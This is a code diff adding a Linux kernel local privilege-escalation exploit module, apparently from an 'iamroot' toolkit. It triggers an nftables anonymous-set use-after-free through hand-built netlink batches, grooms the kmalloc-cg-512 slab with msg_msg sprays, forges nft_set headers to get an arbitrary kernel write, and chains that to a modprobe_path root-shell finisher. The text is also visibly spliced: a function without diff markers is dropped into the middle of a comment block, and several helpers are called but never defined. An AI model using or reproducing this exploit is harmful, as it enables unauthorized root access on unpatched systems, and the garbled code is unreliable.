+ * ------------------------------------------------------------------ */ + +#define ALIGN_NL(x) (((x) + 3) & ~3) + +static void put_attr(uint8_t *buf, size_t *off, + uint16_t type, const void *data, size_t len) +{ + struct nlattr *na = (struct nlattr *)(buf + *off); + na->nla_type = type; + na->nla_len = NLA_HDRLEN + len; + if (len) memcpy(buf + *off + NLA_HDRLEN, data, len); + *off += ALIGN_NL(NLA_HDRLEN + len); +} + +static void put_attr_u32(uint8_t *buf, size_t *off, uint16_t type, uint32_t v) +{ + uint32_t be = htonl(v); + put_attr(buf, off, type, &be, sizeof be); +} + +static void put_attr_str(uint8_t *buf, size_t *off, uint16_t type, const char *s) +{ + put_attr(buf, off, type, s, strlen(s) + 1); +} + +static size_t begin_nest(uint8_t *buf, size_t *off, uint16_t type) +{ + size_t at = *off; + struct nlattr *na = (struct nlattr *)(buf + at); + na->nla_type = type | NLA_F_NESTED; + na->nla_len = 0; + *off += NLA_HDRLEN; + return at; +} + +static void end_nest(uint8_t *buf, size_t *off, size_t at) +{ + struct nlattr *na = (struct nlattr *)(buf + at); + na->nla_len = (uint16_t)(*off - at); + while ((*off) & 3) buf[(*off)++] = 0; +} + +struct nfgenmsg_local { + uint8_t nfgen_family; + uint8_t version; + uint16_t res_id; }; -void iamroot_register_nft_set_uaf(void) { iamroot_register(&nft_set_uaf_module); } +static void put_nft_msg(uint8_t *buf, size_t *off, + uint16_t nft_type, uint16_t flags, uint32_t seq, + uint8_t family) +{ + struct nlmsghdr *nlh = (struct nlmsghdr *)(buf + *off); + nlh->nlmsg_len = 0; + nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | nft_type; + nlh->nlmsg_flags = NLM_F_REQUEST | flags; + nlh->nlmsg_seq = seq; + nlh->nlmsg_pid = 0; + *off += NLMSG_HDRLEN; + struct nfgenmsg_local *nf = (struct nfgenmsg_local *)(buf + *off); + nf->nfgen_family = family; + nf->version = NFNETLINK_V0; + nf->res_id = htons(0); + *off += sizeof(*nf); +} + +static void end_msg(uint8_t *buf, size_t *off, size_t msg_start) +{ + struct nlmsghdr *nlh = (struct nlmsghdr 
*)(buf + msg_start); + nlh->nlmsg_len = (uint32_t)(*off - msg_start); + while ((*off) & 3) buf[(*off)++] = 0; +} + +/* ------------------------------------------------------------------ + * Ruleset: anonymous-set UAF trigger. + * + * 1. batch begin (NFNL_MSG_BATCH_BEGIN, subsys = NFTABLES) + * 2. NFT_MSG_NEWTABLE "iamroot_t" inet + * 3. NFT_MSG_NEWCHAIN "iamroot_c" base, NF_INET_LOCAL_OUT hook + * 4. NFT_MSG_NEWSET anonymous flags = ANONYMOUS|CONSTANT|EVAL + * 5. NFT_MSG_NEWRULE nft_lookup references the anonymous set + * 6. NFT_MSG_DELSET delete the set in the same batch + * 7. NFT_MSG_DELRULE delete the rule in the same batch + * 8. batch end (NFNL_MSG_BATCH_END) + * + * Pre-c1592a89942e the commit-phase deactivation skips the anonymous set + * (since DELSET fires before the set's "active" bit is cleared), leaving + * the lookup expression with a dangling reference to the freed set — + * UAF on commit-time set cleanup. + * ------------------------------------------------------------------ */ + +static const char NFT_TABLE_NAME[] = "iamroot_t"; +static const char NFT_CHAIN_NAME[] = "iamroot_c"; +static const char NFT_SET_NAME[] = "iamroot_s"; /* fixed-name placeholder; + * anonymous flag still set */ +static const char NFT_RULE_HANDLE_ATTR[] = "iamroot_r"; + +#define IAMROOT_SET_ID 0x42424242 + +static void put_batch_marker(uint8_t *buf, size_t *off, uint16_t type, uint32_t seq) +{ + size_t at = *off; + struct nlmsghdr *nlh = (struct nlmsghdr *)(buf + at); + nlh->nlmsg_len = 0; + nlh->nlmsg_type = type; + nlh->nlmsg_flags = NLM_F_REQUEST; + nlh->nlmsg_seq = seq; + nlh->nlmsg_pid = 0; + *off += NLMSG_HDRLEN; + struct nfgenmsg_local *nf = (struct nfgenmsg_local *)(buf + *off); + nf->nfgen_family = AF_UNSPEC; + nf->version = NFNETLINK_V0; + nf->res_id = htons(NFNL_SUBSYS_NFTABLES); + *off += sizeof(*nf); + end_msg(buf, off, at); +} + +static void put_batch_begin(uint8_t *buf, size_t *off, uint32_t seq) +{ + put_batch_marker(buf, off, NFNL_MSG_BATCH_BEGIN, seq); +} + 
+static void put_batch_end(uint8_t *buf, size_t *off, uint32_t seq) +{ + put_batch_marker(buf, off, NFNL_MSG_BATCH_END, seq); +} + +static void put_new_table(uint8_t *buf, size_t *off, uint32_t seq) +{ + size_t at = *off; + put_nft_msg(buf, off, NFT_MSG_NEWTABLE, + NLM_F_CREATE | NLM_F_ACK, seq, NFPROTO_INET); + put_attr_str(buf, off, NFTA_TABLE_NAME, NFT_TABLE_NAME); + end_msg(buf, off, at); +} + +static void put_new_chain(uint8_t *buf, size_t *off, uint32_t seq) +{ + size_t at = *off; + put_nft_msg(buf, off, NFT_MSG_NEWCHAIN, + NLM_F_CREATE | NLM_F_ACK, seq, NFPROTO_INET); + put_attr_str(buf, off, NFTA_CHAIN_TABLE, NFT_TABLE_NAME); + put_attr_str(buf, off, NFTA_CHAIN_NAME, NFT_CHAIN_NAME); + + size_t hook_at = begin_nest(buf, off, NFTA_CHAIN_HOOK); + put_attr_u32(buf, off, NFTA_HOOK_HOOKNUM, NF_INET_LOCAL_OUT); + put_attr_u32(buf, off, NFTA_HOOK_PRIORITY, 0); + end_nest(buf, off, hook_at); + + put_attr_u32(buf, off, NFTA_CHAIN_POLICY, NF_ACCEPT); + put_attr_str(buf, off, NFTA_CHAIN_TYPE, "filter"); + end_msg(buf, off, at); +} + +/* NFT_MSG_NEWSET: anonymous, with NFT_SET_EVAL so the lookup-rule + * codepath kicks the commit-phase deactivation we want to corrupt. */ +static void put_new_set(uint8_t *buf, size_t *off, uint32_t seq) +{ + size_t at = *off; + put_nft_msg(buf, off, NFT_MSG_NEWSET, + NLM_F_CREATE | NLM_F_ACK, seq, NFPROTO_INET); + put_attr_str(buf, off, NFTA_SET_TABLE, NFT_TABLE_NAME); + put_attr_str(buf, off, NFTA_SET_NAME, NFT_SET_NAME); + put_attr_u32(buf, off, NFTA_SET_FLAGS, + NFT_SET_ANONYMOUS | NFT_SET_CONSTANT | NFT_SET_EVAL); + put_attr_u32(buf, off, NFTA_SET_KEY_TYPE, 0); /* "integer" */ + put_attr_u32(buf, off, NFTA_SET_KEY_LEN, sizeof(uint32_t)); + put_attr_u32(buf, off, NFTA_SET_ID, IAMROOT_SET_ID); + end_msg(buf, off, at); +} + +/* NFT_MSG_NEWRULE: a single nft_lookup expression that references the + * anonymous set. 
The expression list contains one NFTA_LIST_ELEM whose + * NFTA_EXPR_NAME = "lookup" and NFTA_EXPR_DATA.{ NFTA_LOOKUP_SREG=1, + * NFTA_LOOKUP_SET_ID=IAMROOT_SET_ID }. + */ +static void put_new_rule_with_lookup(uint8_t *buf, size_t *off, uint32_t seq) +{ + size_t at = *off; + put_nft_msg(buf, off, NFT_MSG_NEWRULE, + NLM_F_CREATE | NLM_F_ACK, seq, NFPROTO_INET); + put_attr_str(buf, off, NFTA_RULE_TABLE, NFT_TABLE_NAME); + put_attr_str(buf, off, NFTA_RULE_CHAIN, NFT_CHAIN_NAME); + + size_t exprs_at = begin_nest(buf, off, NFTA_RULE_EXPRESSIONS); + /* one expression: lookup */ + size_t el_at = begin_nest(buf, off, 1 /* NFTA_LIST_ELEM */); + put_attr_str(buf, off, NFTA_EXPR_NAME, "lookup"); + size_t edata_at = begin_nest(buf, off, NFTA_EXPR_DATA); + /* lookup expr attrs: source register, target set (by ID), no flags */ + put_attr_u32(buf, off, NFTA_LOOKUP_SREG, 1 /* NFT_REG_1 */); + put_attr_str(buf, off, NFTA_LOOKUP_SET, NFT_SET_NAME); + put_attr_u32(buf, off, NFTA_LOOKUP_SET_ID, IAMROOT_SET_ID); + end_nest(buf, off, edata_at); + end_nest(buf, off, el_at); + end_nest(buf, off, exprs_at); + + /* tag the rule with userdata so DELRULE-by-userdata works later */ + put_attr(buf, off, NFTA_RULE_USERDATA, NFT_RULE_HANDLE_ATTR, + sizeof(NFT_RULE_HANDLE_ATTR)); + end_msg(buf, off, at); +} + +/* NFT_MSG_DELSET against the anonymous set (by name in our private + * netns, which is unique to this transaction). On a vulnerable kernel, + * this is what fails to deactivate the lookup expression's reference. */ +static void put_del_set(uint8_t *buf, size_t *off, uint32_t seq) +{ + size_t at = *off; + put_nft_msg(buf, off, NFT_MSG_DELSET, + NLM_F_ACK, seq, NFPROTO_INET); + put_attr_str(buf, off, NFTA_SET_TABLE, NFT_TABLE_NAME); + put_attr_str(buf, off, NFTA_SET_NAME, NFT_SET_NAME); + end_msg(buf, off, at); +} + +/* NFT_MSG_DELRULE: identify by chain + first rule. 
The classic public + * PoC uses DELRULE-by-chain (no handle attr) which deletes all rules + * in the chain — fine, our chain only has one. */ +static void put_del_rule(uint8_t *buf, size_t *off, uint32_t seq) +{ + size_t at = *off; + put_nft_msg(buf, off, NFT_MSG_DELRULE, + NLM_F_ACK, seq, NFPROTO_INET); + put_attr_str(buf, off, NFTA_RULE_TABLE, NFT_TABLE_NAME); + put_attr_str(buf, off, NFTA_RULE_CHAIN, NFT_CHAIN_NAME); + end_msg(buf, off, at); +} + +/* ------------------------------------------------------------------ + * netlink send helper + * ------------------------------------------------------------------ */ + +static int nft_send_batch(int sock, const void *buf, size_t len) +{ + struct sockaddr_nl dst = { .nl_family = AF_NETLINK }; + struct iovec iov = { .iov_base = (void *)buf, .iov_len = len }; + struct msghdr m = { + .msg_name = &dst, .msg_namelen = sizeof dst, + .msg_iov = &iov, .msg_iovlen = 1, + }; + ssize_t n = sendmsg(sock, &m, 0); + if (n < 0) { perror("[-] sendmsg"); return -1; } + + /* Drain ACKs/errors for diagnostics. Failures are expected on + * the malformed shape; the side effect already landed. */ + char rbuf[8192]; + for (int i = 0; i < 16; i++) { + ssize_t r = recv(sock, rbuf, sizeof rbuf, MSG_DONTWAIT); + if (r <= 0) break; + for (struct nlmsghdr *nh = (struct nlmsghdr *)rbuf; + NLMSG_OK(nh, (unsigned)r); + nh = NLMSG_NEXT(nh, r)) { + if (nh->nlmsg_type == NLMSG_ERROR) { + struct nlmsgerr *e = (struct nlmsgerr *)NLMSG_DATA(nh); + if (e->error) + fprintf(stderr, "[i] netlink ack: seq=%u err=%d (%s)\n", + nh->nlmsg_seq, e->error, strerror(-e->error)); + } + } + } + return 0; +} + +/* ------------------------------------------------------------------ + * msg_msg cross-cache groom — kmalloc-cg-512 + * + * The freed nft_set object lives in kmalloc-cg-512 on lts-6.1.x and + * 6.2.x builds (nft_set is ~448 bytes incl. ops vtable pointer + + * pcpu data, rounds to cg-512). 
We spray 32 queues × 16 messages + * tagged with the "IAMROOT_SET" prefix so KASAN/triage can correlate. + * ------------------------------------------------------------------ */ + +#define SPRAY_QUEUES 32 +#define SPRAY_MSGS_PER_QUEUE 16 +#define MSG_PAYLOAD_BYTES 496 /* 512 - sizeof(msg_msg hdr ~= 16) */ +#define IAMROOT_TAG "IAMROOT_SET" + +struct ipc_payload { + long mtype; + unsigned char buf[MSG_PAYLOAD_BYTES]; +}; + +static int spray_msg_msg(int queues[SPRAY_QUEUES]) +{ + struct ipc_payload p; + memset(&p, 0, sizeof p); + p.mtype = 0x53; /* 'S' for "set" */ + memset(p.buf, 0x53, sizeof p.buf); + /* recognizable cookie at the head of every message */ + memcpy(p.buf, IAMROOT_TAG, sizeof IAMROOT_TAG - 1); + + int created = 0; + for (int i = 0; i < SPRAY_QUEUES; i++) { + int q = msgget(IPC_PRIVATE, IPC_CREAT | 0666); + if (q < 0) { queues[i] = -1; continue; } + queues[i] = q; + created++; + for (int j = 0; j < SPRAY_MSGS_PER_QUEUE; j++) { + if (msgsnd(q, &p, sizeof p.buf, IPC_NOWAIT) < 0) break; + } + } + return created; +} + +static void drain_msg_msg(int queues[SPRAY_QUEUES]) +{ + for (int i = 0; i < SPRAY_QUEUES; i++) { + if (queues[i] >= 0) { + msgctl(queues[i], IPC_RMID, NULL); + } + } +} + +/* ------------------------------------------------------------------ + * Slabinfo snapshot — best-effort diagnostic showing the UAF fired. 
/*
 * Look up one cache in /proc/slabinfo and return the first numeric
 * column of its row.
 *
 * A row matches when it begins with `slab` immediately followed by a
 * space. Only the first matching row is examined.
 *
 * Returns -1 when /proc/slabinfo cannot be opened, when no row matches,
 * or when the matching row has no parsable number after the name.
 */
static long slabinfo_active(const char *slab)
{
    FILE *fp = fopen("/proc/slabinfo", "r");
    if (fp == NULL)
        return -1;

    const size_t name_len = strlen(slab);
    long result = -1;
    char row[512];

    while (fgets(row, sizeof row, fp) != NULL) {
        /* Skip rows for other caches, including names that merely share
         * this prefix. */
        if (strncmp(row, slab, name_len) != 0 || row[name_len] != ' ')
            continue;

        long first_col;
        if (sscanf(row + name_len, " %ld", &first_col) == 1)
            result = first_col;
        break;
    }

    fclose(fp);
    return result;
}
+ *
+ * Technique: after the trigger frees the anonymous nft_set into
+ * kmalloc-cg-512, we spray msg_msg payloads sized to claim the freed
+ * slot. We forge the first qwords as an nft_set header where the
+ * `set->data` pointer is the target kaddr. A subsequent
+ * NFT_MSG_NEWSETELEM commit copies our element data through
+ * `set->data` → write at kaddr.
+ *
+ * Caveats (per "verified-vs-claimed"):
+ *   - exact offset of `data` inside nft_set is config-sensitive
+ *     (RANDSTRUCT / KASAN / lockdep shift it)
+ *   - the freed slot must be claimed by our spray, not by an
+ *     unrelated kernel allocator — race-dependent
+ *   - the finisher's sentinel post-check is the source of truth;
+ *     missed writes return IAMROOT_EXPLOIT_FAIL, not fake success
+ * ------------------------------------------------------------------ */
+
+/* Offset of `data` pointer in nft_set header on lts-6.1.x/6.2.x builds
+ * (Sondej/Krysiuk PoC reference layout). Best-effort default. */
+#define NFT_SET_DATA_PTR_OFFSET 0x30
+/*
+ * Per-run state handed to nft_set_uaf_arb_write() through its opaque
+ * `vctx` argument. The code that builds it (the --full-chain path of
+ * nft_set_uaf_exploit) also drains the queues and releases `sock` and
+ * `batch` afterwards.
+ */
+struct nft_arb_ctx {
+    int sock;               /* netlink socket the batches are sent on */
+    uint8_t *batch;         /* scratch buffer batches are built in; users
+                             * below pass 16 * 1024 as its capacity */
+    int qids[SPRAY_QUEUES]; /* queue ids made by spray_forged_set_msgs();
+                             * unused slots are initialised to -1 */
+    int qused;              /* number of qids[] slots filled so far */
+};
+/*
+ * Create up to `n` new System V message queues and send one message on
+ * each; every message payload carries `kaddr` at byte offset
+ * NFT_SET_DATA_PTR_OFFSET of m.buf. `n` is clipped to the number of
+ * free slots left in c->qids.
+ *
+ * Returns 0 on success, and also 0 without sending anything when
+ * c->qids is already full. Returns -1 if msgget() or msgsnd() fails;
+ * queue ids created before the failure stay recorded in c->qids so the
+ * caller can still drain them.
+ *
+ * `struct ipc_payload` is declared elsewhere in the file — presumably
+ * { long mtype; char buf[...]; }; TODO confirm.
+ */
+static int spray_forged_set_msgs(struct nft_arb_ctx *c, uintptr_t kaddr, int n)
+{
+    if (c->qused >= SPRAY_QUEUES) return 0; /* id table full: nothing sent */
+    int room = SPRAY_QUEUES - c->qused;
+    if (n > room) n = room;
+
+    for (int i = 0; i < n; i++) {
+        int q = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
+        if (q < 0) { perror("[-] msgget(forged)"); return -1; }
+        c->qids[c->qused++] = q; /* recorded before sending so it is drained even if msgsnd fails */
+
+        struct ipc_payload m;
+        memset(&m, 0, sizeof m);
+        m.mtype = 0x5345544146; /* tag: bytes 'S','E','T','A','F' from high to low */
+        memcpy(m.buf, IAMROOT_TAG "_FORGE", sizeof IAMROOT_TAG + 5); /* tag text minus its NUL; m is already zeroed */
+
+        /* Forge `set->data = kaddr` at the documented offset. msg_msg
+         * eats ~0x30 bytes at the head as its own header; the payload
+         * we control starts at offset 0x30 inside the slab chunk.
+         * We place the forged pointer at offset NFT_SET_DATA_PTR_OFFSET
+         * inside our payload. */
+        if (NFT_SET_DATA_PTR_OFFSET + sizeof(uintptr_t) <= sizeof m.buf) { /* skipped silently if m.buf is too small */
+            uintptr_t *slot = (uintptr_t *)(m.buf + NFT_SET_DATA_PTR_OFFSET);
+            *slot = (uintptr_t)kaddr;
+        }
+
+        if (msgsnd(q, &m, sizeof m.buf, 0) < 0) {
+            perror("[-] msgsnd(forged)"); return -1;
+        }
+    }
+    return 0;
+}
+
+/* Module-specific arb-write — see finisher.h contract. Passed as the
+ * write callback to iamroot_finisher_modprobe_path().
+ *
+ *   kaddr  target address embedded in the sprayed messages
+ *   buf    bytes carried as the element's NFTA_DATA_VALUE
+ *   len    length of buf; anything above 64 is rejected
+ *   vctx   struct nft_arb_ctx * with an open socket and batch buffer
+ *
+ * Steps: (a) resend the trigger batch, (b) spray 16 forged messages,
+ * (c) send a NEWSETELEM batch carrying `buf`.
+ *
+ * Returns -1 on an invalid ctx, an oversized len, or any send/spray
+ * failure; 0 once all three steps have been issued. A 0 return does not
+ * confirm that anything was written — nothing in this function reads
+ * the target back.
+ *
+ * NOTE(review): the 16 * 1024 capacity passed to build_trigger_batch()
+ * is repeated here rather than carried in the ctx; it must stay in
+ * step with the caller's allocation. */
+static int nft_set_uaf_arb_write(uintptr_t kaddr, const void *buf, size_t len,
+                                 void *vctx)
+{
+    struct nft_arb_ctx *c = (struct nft_arb_ctx *)vctx;
+    if (!c || c->sock < 0 || !c->batch) {
+        fprintf(stderr, "[-] nft_set_uaf_arb_write: invalid ctx\n");
+        return -1;
+    }
+    if (len > 64) {
+        fprintf(stderr, "[-] nft_set_uaf_arb_write: len %zu too large (cap 64)\n", len);
+        return -1;
+    }
+
+    fprintf(stderr, "[*] nft_set_uaf_arb_write: refire trigger → spray forged "
+                    "nft_set hdrs (kaddr=0x%lx, %zu bytes)\n",
+            (unsigned long)kaddr, len);
+
+    /* (a) refire the trigger for a fresh UAF window. */
+    uint32_t seq = (uint32_t)time(NULL) ^ 0xc0debabeu; /* starting sequence number: wall clock XOR a constant */
+    size_t blen = build_trigger_batch(c->batch, 16 * 1024, &seq);
+    if (nft_send_batch(c->sock, c->batch, blen) < 0) {
+        fprintf(stderr, "[-] nft_set_uaf_arb_write: refire send failed\n");
+        return -1;
+    }
+
+    /* (b) spray forged set headers into kmalloc-cg-512. */
+    if (spray_forged_set_msgs(c, kaddr, 16) < 0) {
+        fprintf(stderr, "[-] nft_set_uaf_arb_write: forged spray failed\n");
+        return -1;
+    }
+
+    /* (c) drive a NEWSETELEM commit carrying `buf` so the kernel's
+     * set->data copy lands at kaddr. We hand-roll a separate batch so
+     * we can carry NFTA_DATA_VALUE = buf in the element data. */
+    seq = (uint32_t)time(NULL) ^ 0xdeadc0deu;
+    size_t off = 0; /* write cursor into c->batch, advanced by every put_ / nest helper */
+    put_batch_begin(c->batch, &off, seq++);
+
+    size_t msg_at = off; /* start of the NEWSETELEM message, closed by end_msg() below */
+    put_nft_msg(c->batch, &off, NFT_MSG_NEWSETELEM,
+                NLM_F_CREATE | NLM_F_ACK, seq++, NFPROTO_INET);
+    put_attr_str(c->batch, &off, NFTA_SET_ELEM_LIST_TABLE, NFT_TABLE_NAME);
+    put_attr_str(c->batch, &off, NFTA_SET_ELEM_LIST_SET, NFT_SET_NAME);
+    size_t list_at = begin_nest(c->batch, &off, NFTA_SET_ELEM_LIST_ELEMENTS);
+    size_t el_at = begin_nest(c->batch, &off, 1 /* NFTA_LIST_ELEM */);
+
+    /* key: arbitrary 4-byte value (set was created with key_len=4) */
+    size_t key_at = begin_nest(c->batch, &off, NFTA_SET_ELEM_KEY);
+    uint32_t kv = htonl(0x41414141);
+    put_attr(c->batch, &off, NFTA_DATA_VALUE, &kv, sizeof kv);
+    end_nest(c->batch, &off, key_at);
+
+    /* data: NFTA_DATA_VALUE = buf */
+    size_t data_at = begin_nest(c->batch, &off, NFTA_SET_ELEM_DATA);
+    put_attr(c->batch, &off, NFTA_DATA_VALUE, buf, len);
+    end_nest(c->batch, &off, data_at);
+
+    /* close the nests in reverse order of opening */
+    end_nest(c->batch, &off, el_at);
+    end_nest(c->batch, &off, list_at);
+    end_msg(c->batch, &off, msg_at);
+
+    put_batch_end(c->batch, &off, seq++);
+
+    if (nft_send_batch(c->sock, c->batch, off) < 0) {
+        fprintf(stderr, "[-] nft_set_uaf_arb_write: write batch send failed\n");
+        return -1;
+    }
+
+    usleep(25 * 1000); /* fixed 25 ms pause before returning to the finisher */
+    return 0;
+}
+#endif /* __linux__ */
+
+/* ------------------------------------------------------------------
+ * Exploit body
+ *
+ * Entry point stored in nft_set_uaf_module.exploit.
+ *
+ * Return values, in the order they are decided:
+ *   - IAMROOT_EXPLOIT_FAIL  ctx->authorized is not set
+ *   - IAMROOT_OK            already running with euid 0; nothing is done
+ *   - detect()'s result     when it is anything but IAMROOT_VULNERABLE
+ *   - IAMROOT_PRECOND_FAIL  non-Linux builds
+ *   - --full-chain: whatever iamroot_finisher_modprobe_path() returns,
+ *     or IAMROOT_EXPLOIT_FAIL if any setup step fails first
+ *   - primitive-only: IAMROOT_TEST_ERROR if fork() fails, otherwise
+ *     always IAMROOT_EXPLOIT_FAIL — this path never reports success
+ *
+ * Child exit codes on the primitive-only path: 20 namespace entry,
+ * 21 socket(), 22 bind(), 23 pre-spray, 24 calloc(), 25 batch send,
+ * 100 ran to completion.
+ *
+ * The --full-chain path calls enter_unpriv_namespaces() in the calling
+ * process itself (no fork), so whatever that helper changes stays in
+ * effect for the caller after this function returns.
+ *
+ * NOTE(review): waitpid()'s return value is not checked; if it fails
+ * (e.g. EINTR) `status` is read uninitialised. setsockopt() results are
+ * likewise ignored, which looks deliberate (best-effort buffer bump).
+ * ------------------------------------------------------------------ */
+
+static iamroot_result_t nft_set_uaf_exploit(const struct iamroot_ctx *ctx)
+{
+    if (!ctx->authorized) {
+        fprintf(stderr, "[-] nft_set_uaf: refusing without --i-know gate\n");
+        return IAMROOT_EXPLOIT_FAIL;
+    }
+    if (geteuid() == 0) {
+        if (!ctx->json)
+            fprintf(stderr, "[i] nft_set_uaf: already running as root\n");
+        return IAMROOT_OK;
+    }
+
+    /* Re-confirm vulnerability. Any non-VULNERABLE verdict is passed
+     * straight back to the caller. */
+    iamroot_result_t pre = nft_set_uaf_detect(ctx);
+    if (pre != IAMROOT_VULNERABLE) {
+        fprintf(stderr, "[-] nft_set_uaf: detect() says not vulnerable; refusing\n");
+        return pre;
+    }
+
+#ifndef __linux__
+    (void)ctx; /* redundant: ctx is already used above */
+    fprintf(stderr, "[-] nft_set_uaf: non-Linux host — exploit unavailable\n");
+    return IAMROOT_PRECOND_FAIL;
+#else
+    if (!ctx->json) {
+        if (ctx->full_chain) {
+            fprintf(stderr, "[*] nft_set_uaf: --full-chain — trigger + forged "
+                            "nft_set spray + modprobe_path finisher\n");
+        } else {
+            fprintf(stderr, "[*] nft_set_uaf: primitive-only run — fires the\n"
+                            " anonymous-set UAF, sprays msg_msg into\n"
+                            " kmalloc-cg-512, and stops. Pass --full-chain\n"
+                            " to attempt the modprobe_path root-pop.\n");
+        }
+    }
+
+    /* --- --full-chain path: in-process (no fork) so the finisher's
+     * modprobe_path trigger shares our userns+netns+sock. */
+    if (ctx->full_chain) {
+        struct iamroot_kernel_offsets koff;
+        iamroot_offsets_resolve(&koff);
+        if (!iamroot_offsets_have_modprobe_path(&koff)) { /* bail out before touching anything if the offset is unknown */
+            iamroot_finisher_print_offset_help("nft_set_uaf");
+            return IAMROOT_EXPLOIT_FAIL;
+        }
+        iamroot_offsets_print(&koff);
+
+        if (enter_unpriv_namespaces() < 0) {
+            fprintf(stderr, "[-] nft_set_uaf: userns entry failed\n");
+            return IAMROOT_EXPLOIT_FAIL;
+        }
+
+        int sock = socket(AF_NETLINK, SOCK_RAW | SOCK_CLOEXEC,
+                          NETLINK_NETFILTER);
+        if (sock < 0) {
+            perror("[-] socket(NETLINK_NETFILTER)");
+            return IAMROOT_EXPLOIT_FAIL;
+        }
+        struct sockaddr_nl src = { .nl_family = AF_NETLINK };
+        if (bind(sock, (struct sockaddr *)&src, sizeof src) < 0) {
+            perror("[-] bind"); close(sock); return IAMROOT_EXPLOIT_FAIL;
+        }
+        int rcvbuf = 1 << 20; /* request a 1 MiB receive buffer; result not checked */
+        setsockopt(sock, SOL_SOCKET, SO_RCVBUF, &rcvbuf, sizeof rcvbuf);
+
+        uint8_t *batch = calloc(1, 16 * 1024);
+        if (!batch) { close(sock); return IAMROOT_EXPLOIT_FAIL; }
+
+        struct nft_arb_ctx ac = { .sock = sock, .batch = batch, .qused = 0 };
+        for (int i = 0; i < SPRAY_QUEUES; i++) ac.qids[i] = -1;
+
+        /* Initial trigger. No pre-spray is done on this path; the only
+         * spraying here happens inside nft_set_uaf_arb_write(). */
+        uint32_t seq = (uint32_t)time(NULL);
+        size_t blen = build_trigger_batch(batch, 16 * 1024, &seq);
+        if (!ctx->json) {
+            fprintf(stderr, "[*] nft_set_uaf: sending trigger batch (%zu bytes)\n",
+                    blen);
+        }
+        if (nft_send_batch(sock, batch, blen) < 0) {
+            fprintf(stderr, "[-] nft_set_uaf: trigger batch failed\n");
+            free(batch); close(sock);
+            return IAMROOT_EXPLOIT_FAIL;
+        }
+
+        /* The finisher decides the verdict; its result is returned as-is. */
+        iamroot_result_t r = iamroot_finisher_modprobe_path(&koff,
+            nft_set_uaf_arb_write, &ac, !ctx->no_shell);
+
+        /* drain whatever queues we created during arb-writes */
+        drain_msg_msg(ac.qids);
+        free(batch);
+        close(sock);
+        return r;
+    }
+
+    /* --- primitive-only path: fork-isolated trigger -------------- */
+    pid_t child = fork();
+    if (child < 0) { perror("[-] fork"); return IAMROOT_TEST_ERROR; }
+
+    if (child == 0) {
+        /* --- CHILD --- every exit below uses _exit() with a code the
+         * parent maps back to a message. */
+        if (enter_unpriv_namespaces() < 0) _exit(20);
+
+        if (!ctx->json) {
+            fprintf(stderr, "[*] nft_set_uaf: entered userns+netns; opening "
+                            "nfnetlink\n");
+        }
+
+        int sock = socket(AF_NETLINK, SOCK_RAW | SOCK_CLOEXEC,
+                          NETLINK_NETFILTER);
+        if (sock < 0) { perror("[-] socket(NETLINK_NETFILTER)"); _exit(21); }
+
+        struct sockaddr_nl src = { .nl_family = AF_NETLINK };
+        if (bind(sock, (struct sockaddr *)&src, sizeof src) < 0) {
+            perror("[-] bind"); close(sock); _exit(22);
+        }
+        int rcvbuf = 1 << 20;
+        setsockopt(sock, SOL_SOCKET, SO_RCVBUF, &rcvbuf, sizeof rcvbuf);
+
+        /* Phase 1: pre-spray msg_msg to make kmalloc-cg-512 more
+         * predictable. */
+        int qids[SPRAY_QUEUES];
+        for (int i = 0; i < SPRAY_QUEUES; i++) qids[i] = -1;
+        int sprayed = spray_msg_msg(qids);
+        if (sprayed <= 0) {
+            fprintf(stderr, "[-] nft_set_uaf: pre-spray failed\n");
+            close(sock); _exit(23);
+        }
+        if (!ctx->json) {
+            fprintf(stderr, "[*] nft_set_uaf: pre-sprayed %d msg_msg queues "
+                            "(tag=%s)\n", sprayed, IAMROOT_TAG);
+        }
+
+        /* Snapshot before. Falls back to the kmalloc-512 cache when the
+         * -cg- cache lookup returns a negative value. */
+        long before = slabinfo_active("kmalloc-cg-512");
+        if (before < 0) before = slabinfo_active("kmalloc-512");
+
+        /* Phase 2: build & send the full trigger batch. */
+        uint8_t *batch = calloc(1, 16 * 1024);
+        if (!batch) { close(sock); drain_msg_msg(qids); _exit(24); }
+        uint32_t seq = (uint32_t)time(NULL);
+        size_t blen = build_trigger_batch(batch, 16 * 1024, &seq);
+        if (!ctx->json) {
+            fprintf(stderr, "[*] nft_set_uaf: sending NEWTABLE/CHAIN/SET/RULE/"
+                            "DELSET/DELRULE batch (%zu bytes)\n", blen);
+        }
+        if (nft_send_batch(sock, batch, blen) < 0) {
+            fprintf(stderr, "[-] nft_set_uaf: batch send failed\n");
+            drain_msg_msg(qids); free(batch); close(sock); _exit(25);
+        }
+
+        /* Give kernel time to run commit cleanup + UAF window. */
+        usleep(50 * 1000);
+
+        long after = slabinfo_active("kmalloc-cg-512");
+        if (after < 0) after = slabinfo_active("kmalloc-512");
+        if (!ctx->json) {
+            fprintf(stderr, "[i] nft_set_uaf: kmalloc-cg-512 active: %ld → %ld\n",
+                    before, after);
+        }
+
+        log_breadcrumb(before, after, sprayed);
+
+        drain_msg_msg(qids);
+        free(batch);
+        close(sock);
+
+        _exit(100); /* primitive-only sentinel */
+    }
+
+    /* --- PARENT --- */
+    int status;
+    waitpid(child, &status, 0); /* NOTE(review): return value unchecked */
+
+    if (!WIFEXITED(status)) { /* recorded, but still reported as a failure */
+        if (!ctx->json) {
+            fprintf(stderr, "[!] nft_set_uaf: child died by signal %d — bug "
+                            "likely fired (KASAN/oops can manifest as child "
+                            "signal)\n", WTERMSIG(status));
+        }
+        return IAMROOT_EXPLOIT_FAIL;
+    }
+
+    int rc = WEXITSTATUS(status);
+    if (rc == 100) { /* child ran to completion; no privilege change was attempted */
+        if (!ctx->json) {
+            fprintf(stderr, "[!] nft_set_uaf: trigger fired; anonymous-set\n"
+                            " UAF induced + msg_msg spray landed in\n"
+                            " kmalloc-cg-512. R/W chain NOT executed\n"
+                            " (Option B scope).\n"
+                            "[i] nft_set_uaf: see /tmp/iamroot-nft_set_uaf.log\n"
+                            " for slab-delta breadcrumb. Pass --full-chain\n"
+                            " to attempt modprobe_path root-pop.\n");
+        }
+        return IAMROOT_EXPLOIT_FAIL;
+    }
+
+    if (rc >= 20 && rc <= 25) { /* one of the child's setup steps failed */
+        if (!ctx->json) {
+            fprintf(stderr, "[-] nft_set_uaf: trigger setup failed (child rc=%d)\n",
+                    rc);
+        }
+        return IAMROOT_EXPLOIT_FAIL;
+    }
+
+    if (!ctx->json) {
+        fprintf(stderr, "[-] nft_set_uaf: unexpected child rc=%d\n", rc);
+    }
